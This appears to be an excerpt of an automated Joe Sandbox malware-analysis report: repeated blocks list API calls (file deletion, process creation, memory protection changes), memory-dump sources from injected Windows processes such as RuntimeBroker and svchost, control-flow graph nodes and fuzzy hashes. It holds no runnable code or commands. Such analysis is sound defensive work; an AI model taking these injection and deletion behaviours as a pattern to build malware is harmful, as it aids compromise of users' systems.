• Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction Fuzzy Hash: 8D4130B15002289FDB22BB618D49FAF76BCEF60705F0444AEEA45E7041DB74DA80CEA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(00000000,02412A2F), ref: 02412A3E
  • Part of subcall function 02412B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02412C68
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AB8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02412B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02412B66
Memory Dump Source
• Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2410000_bin.jbxd
Similarity
• API ID: DeleteFile$Sleep$lstrcat
• String ID:
• API String ID: 531250245-0
• Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction ID: d5b34a25ca83654549debdb6c4af446f6cbf64038981b3b82e27acc5b618038e
                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction Fuzzy Hash: B53123715006689EDB22EF31CD48FAF76BDEF40709F4044ABAE45EA054DB749580CEA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                            • Part of subcall function 001C2B4D: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 001C2C44
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction ID: 49968fa7a4b5d5aca4da9ad6627b8677a1410d3c3c0f57381d6fd9009df4eb89
                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction Fuzzy Hash: B9313EB15002699FDB227B618C48FAF76FCEF60705F0044AEEA45E7045DB34DA80CEA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0241320E
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 0241324C
                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,024131D9,00000011,?,00000000,00000000), ref: 02413279
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,024131D9,00000011,?,00000000,00000000,00000000,02413092,00000004,00000000), ref: 02413285
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,024131D9,00000011,?,00000000,00000000,00000000,02413092,00000004,00000000), ref: 02413291
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction ID: 479f6e983e7f99b8d0cbcb2b0fe015b63c032f0bebc601512d7cfd5ae0514e95
                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction Fuzzy Hash: 271124724005289FDF12AF60CC88B9FB7FDEF40705F01459AE985EA004DB745A80CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 001C31EA
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 001C3228
                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C31B5,00000011,?,00000000,00000000), ref: 001C3255
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C3261
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C326D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction ID: 1a8fcc1b29af6dc6d508c4043910ddb7290efc2c1b1de9f1c1491fbd14d99cd8
                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction Fuzzy Hash: 871121B2504958AFDF12AF60CC45FAF77BCEF60305F0145A9E986EA005DB349A90CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • FindWindowA.USER32(001C0B57,0000000E), ref: 001C0B6A
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 001C0B77
                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 001C0B84
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 001C0BA6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Window$ExitFindOpenThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 273847653-0
                                                                                                                                                                          • Opcode ID: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                          • Instruction ID: a9338b71442d5d3ebf48e46985c07ff31f3dafee2d3b1c7779650113a65b08a8
                                                                                                                                                                          • Opcode Fuzzy Hash: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                          • Instruction Fuzzy Hash: CE11EF25204301AEEF136BB08D56F663F28AF36B00F0A419DF8449E0A3DB20C9429A38
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,02413F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02413F51
                                                                                                                                                                          • Sleep.KERNEL32(000003E8,00000000,?,02413F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02413F6F
                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 02413F7F
                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 02413F8F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                          • Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                          • Instruction ID: acc4a659522aac116112dbc9359ba58cefc6edd40eb1a3042a2206ca228f25c5
                                                                                                                                                                          • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF0F8705443509AFF403FB2884C74A3EB9AF0070CF0400DABA8AAD096CE7481948F65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(001C3EBD,00000006,E8FFFE1B,00000000), ref: 001C3EC8
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLibraryLoadModule
                                                                                                                                                                          • String ID: j
                                                                                                                                                                          • API String ID: 4133054770-2747090070
                                                                                                                                                                          • Opcode ID: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                          • Instruction ID: c4430a2c0c24a2b0bdc06aa21888522cca28319f24652424d60ea3f5ea681fdb
                                                                                                                                                                          • Opcode Fuzzy Hash: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                          • Instruction Fuzzy Hash: BEF0C871948250AEEB127A708855FAE32BCAF70701F00C45DBA95DA041DF30C740DAB7
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
Memory Dump Source
• Source File: 00000015.00000002.2965526890.0000000000580000.00000040.00000001.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_580000_TextInputHost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: ad2bcb2392a4eecc8ec5ac587f61150cc7b45fc580965541663a43ffb8525291
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 8131C3720006056FEF417B709D4AABA7FACFF51310F001165BD85EA0E2EA7449A98BB6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000016.00000002.2834831450.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_3d0000_RuntimeBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 37606bd29bffd8747609349bc4e3a59d52761269dbb140b3fc6ccf4b2a91a728
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: DF31D4734102047FEB077B70AD46BBA3BACEF11700F000167BD95DE2A6EA7449649AB5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000017.00000002.2834786421.0000000000900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_900000_RuntimeBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 807355393fe14c1897a20badd90106663a8bf34a3f2784256eb9570d4bf43842
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 9A31E472000204AFEB017B709D86BBA3BACFF91300F444166FD85DA0E2EA7549A48AB5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000018.00000002.2966200143.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_180000_ApplicationFrameHost.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction ID: f7edfa1d29ee3a2f15c71f23f1afa3dacc25a52c64f2328ccefa2793ada852ba
• Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction Fuzzy Hash: 1121E531A34C1D0BEB58B27C9859764F6D6E79C320F980295E90DD36E4ED58CC8287C6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000018.00000002.2966200143.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_180000_ApplicationFrameHost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 5f0a2bf08c062a83ee58e576ca9a39c726153a08bf7c3d9358f7d983c0235e19
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 7331B6724102087FEB427F709D46ABA376CEF26310F440165BD85DA0A6EB744BA9CFB5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000001A.00000002.2966192849.0000000000190000.00000040.00000001.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_190000_RuntimeBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 623531ca5508d48381e8169b3b0e04df07f96b68e4b13c9decdab74f5fa118bc
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: F131F772510205BFEF027F709D46ABA3BACEF25300F400565BD85DA0A2EB744DA4CBB5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000001C.00000002.2966200483.0000000000010000.00000040.00000001.00020000.00000000.sdmp, Offset: 00010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_10000_UserOOBEBroker.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction ID: 9f39b5367da6598aeeb1998e776373a994835cae58933e0181d4283a84448e61
• Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction Fuzzy Hash: 6021F930B34C1D0BEB5CA27C98597A4F6E2E79C320F940295EA0DD36D4ED58CC8183C6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                                                                                          control_flow_graph 11 10811-10846 call 1086e 14 10848-10851 11->14 15 108ad-108ae 11->15 16 10853-1085c 14->16 17 108af-108b0 14->17 15->17 18 108d0-108d7 call 108d9 16->18 19 1085e 16->19 28 108d9-1090f call 10cc4 call 114bc call 10643 call 10ce8 18->28 20 10860-10861 19->20 21 108c5-108cc 19->21 23 10863 20->23 24 108b9-108c2 call 11756 call 11e62 20->24 21->18 27 10866-1086f 23->27 23->28 24->21 31 10871-10897 27->31 32 1089e-108a4 27->32 45 10911-1091a call 11756 call 11e62 28->45 46 10939 call 1093e 28->46 31->32 32->15 51 1091f-10933 SleepEx RtlExitUserThread 45->51 51->46
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000001C.00000002.2966200483.0000000000010000.00000040.00000001.00020000.00000000.sdmp, Offset: 00010000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_28_2_10000_UserOOBEBroker.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 6daea8f8473804d12748bca0b7204fc4a623126665c209879b0ad2024dc0075f
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 8231B6724142046FEB017BB09D4AAFA7BACEF11310F044165BDC5DA0A7DEB449D5CBB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000001D.00000002.2966210621.00000000009F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_29_2_9f0000_svchost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: acaf790e11c60cba8a293411a6431baf221f9d6cbfbb05ff914238914326911b
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: BF31D67201024CBFEB017B709D46BBA3B6CEF91350F004165BE85DA0A3EA7549948BB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
Memory Dump Source
• Source File: 0000001E.00000002.2966843068.0000000000880000.00000040.00000001.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_880000_conhost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 880e9aabe061995b8033cec9ddf34236fde6215fc8b9e8af3826ea7dc37c58af
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: A031D4724002086FEF417F749D4AABA3BACFF11300F000165FD85DA0A6EA7449A9CFB6
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000001F.00000002.2966847993.0000000000980000.00000040.00000001.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_980000_dllhost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 05d2ec8a17d838d95e91d8bb6291b1c254e15e4d3c82129372bb541a104e5f8d
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 6231E6720002056FEF417F709D46BBA3BACEF91300F000165BD85DA2A2EA7549A9CBB6
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000021.00000002.2504300821.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_a20000_RuntimeBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 8d758f3a916c03f6e5df19f9fc3d763be8a9d881da75f68633e99bf1337d5061
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: F631E6724002247FEB017B74AE86EBA3BACEF11300F440175BD85DA0A7EA7449A58AB5
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000022.00000002.2967398986.0000000000060000.00000040.00000001.00020000.00000000.sdmp, Offset: 00060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_60000_RuntimeBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 7829851cbd399c4a7dc69e4cc2518204601d444ef535abd62bd0664f49c99fbc
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 4131C4724502046FEB01BB709D8AAFB3BAEEF11310F044166BD85DA0A7EE744D658BB5
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
Memory Dump Source
• Source File: 00000023.00000002.3002373441.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_3070000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 86a9fefce4934b5a333cffb6db5292588555923d7cee170db6eb40ea3dbc61d4
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: 24518331A45354AFEB229F20CC85B9A77FCAF04744F0802D5BA49FE0D6DAB09594CB69
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
Memory Dump Source
• Source File: 00000023.00000002.3002373441.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_3070000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
• Instruction ID: 017be806817093a75857458c5232b068edda4fd13acc0b37dc88a390a8effc62
• Opcode Fuzzy Hash: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
• Instruction Fuzzy Hash: 21210C728056149EDB07EF60C9C8CE673ECEF80604F45096B9D89EF089FA709154CAEA
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
Memory Dump Source
• Source File: 00000023.00000002.3002373441.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_3070000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: 3a0c3ecd972323767d781896da44f67a459339497b0295846b38ba0d6d4338d9
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: 6621AC31A05216AFDB11DEB8C888B9DBBF5AF04300F098225F955BB6D4DB70A900CB98
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
Memory Dump Source
• Source File: 00000023.00000002.3002373441.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_3070000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
• Instruction ID: 0fe5d329beae997d042294d1ae1f77621b18a5665ba787c63f8b4f0693f02e84
• Opcode Fuzzy Hash: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
• Instruction Fuzzy Hash: BC1189768056149EEF03EF60C5C8CEA73FCEE80604B4509AA9D85EF449FE709154CAE9
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

Memory Dump Source
• Source File: 00000023.00000002.3002373441.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_3070000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction ID: ecb83dd5a496519179beab78a50a14464ce1c7e8e3415d1f6b2695ba08c648a6
• Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction Fuzzy Hash: 59F08C3CD8A340AAFF40BBB08C4979D32B8AF80385F0404D0AA89AD0D0CE308551AEF8
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000023.00000002.3002373441.0000000003070000.00000040.00000001.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_35_2_3070000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction ID: 233fa0e0f9852c3c6952d79b4540f11fc55acb3374298afafe964f87364d901d
                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction Fuzzy Hash: 504163B6900208BFEF129F65CC48BDEBFF9EF84704F1540A9EA44AA254D734D650CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

